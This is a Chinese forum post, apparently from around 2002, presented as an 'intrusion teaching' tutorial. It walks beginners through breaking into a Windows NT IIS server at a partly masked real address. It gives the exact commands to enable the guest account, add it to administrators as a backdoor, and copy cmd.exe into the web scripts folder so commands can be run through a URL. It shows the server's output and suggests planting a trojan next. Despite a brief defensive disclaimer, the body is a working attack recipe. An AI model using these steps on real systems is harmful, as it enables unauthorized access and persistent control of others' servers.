lansing
级别:精灵王 威望:0 经验:3 货币:1287 体力: 来源:河北保定 总发帖数:867 注册日期:2002-03-13 |
|
查看 邮件 主页 QQ 消息 引用 复制 下载
一次巧妙的nt入侵(xhacker原创)
--------------------------------------------------------------------------------
发布者:xhacker 来源:原创 类别:入侵教学 日期:02-23 今日/总浏览: 82/6569
***************************************************************************************************
关于入侵栏目中的文章申明:本文章中介绍的内容跟中国红客网络技术联盟(http://www.cnhonker.net)没有任何关系,中国红客网络技术联盟也不赞成任何具有破坏性的行为。在这里发布该文章,主要是为网络安全行业和网络管理员等提供必要的参考,从入侵的角度,来分析入侵行为,并相应做好防范。
****************************************************************************************************
照常启动流光4.5破解版,按ctrl+r,选择winnt/98,然后随便填上一个IP段,本人填的就是某一**的IP,确定后扫描过一会,出现了战果了:
其中**网站的漏洞是可以执行iis远程命令和可以下载sam。都很常见的漏洞,如果仔细点扫描一定还有其它的漏洞。
这里就用执行iis远程命令吧。sam的还要破解,太麻烦。 先连上去,输入ver 显示winnt 4.0的
先留个后门: net user guest /activer:y net user guest xhacker
/add net localgroup administrators guest /add
留好了,这样可以方便地拷贝程序上去了。停!
对于很多人来说,怎么通过net启动程序是个大问题!所以本人就为了菜菜们独创一招:转向unicode攻击法!
unicode是最受欢迎的漏洞,教程也最多,在这就不写多少了。可是**网站根本没有这个漏洞啊,没关系,告诉你无敌的一招!
再输入关键一句(cmd.exe的位置自己dir了): copy c:\winnt\system32\cmd.exe
c:\inetpub\scripts\xhacker.exe (大家不要学我把cmd.exe改的这么嚣张) copy
c:\winnt\system32\cmd.exe c:\inetpub\scripts\xhacker.exe 1
file(s) copied. 好了,结束输入 exit
现在可以转到IE上输入这么一句,太熟悉了,现在变成unicode攻击法了!
http://202.x.x.166/scripts/xhacker.exe?/c+set CGI 错误 指定的
CGI 应用程序因为没有返回完整的 HTTP 标题而运行不正常。它返回的标题是:
COMPUTERNAME=SERVER
ComSpec=C:\WINNT\system32\cmd.exe (呵呵,cmd.exe的路径)
CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive
HTTP_HOST=202.102.118.166 HTTP_USER_AGENT=Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)
HTTP_ACCEPT_ENCODING=gzip, deflate HTTPS=off
INCLUDE=C:\Program Files\Mts\Include INSTANCE_ID=1
LIB=C:\Program Files\Mts\Lib LOCAL_ADDR=x.x.x.x (我的IP,不好啊)
NUMBER_OF_PROCESSORS=2 Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT (看到了吗?)
Path=C:\WINNT\system32;C:\WINNT;C:\Program Files\Mts
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=C:\InetPub\wwwroot (主页目录,重要哦!)
PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6
Model 5 Stepping 3, GenuineIntel PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0503 PROMPT=$P$G QUERY_STRING=/c+set
(刚才使用的命令!别忘本哦) REMOTE_ADDR=61. 哈哈,现在就用你熟悉的方法搞定它吧。
当然还可以用net命令copy上一个木马程序,然后用unicode启动!
此文只是提出了其它的思路。比如ida/idq攻击也可以转为unicode攻击。
其实还有许多比较好的技巧在里面,聪明的网络爱好者们自己去思考吧。88
如要转载请注明出处:http://xhacker.xilubbs.com
发布者:
xhacker 来源: 原创
|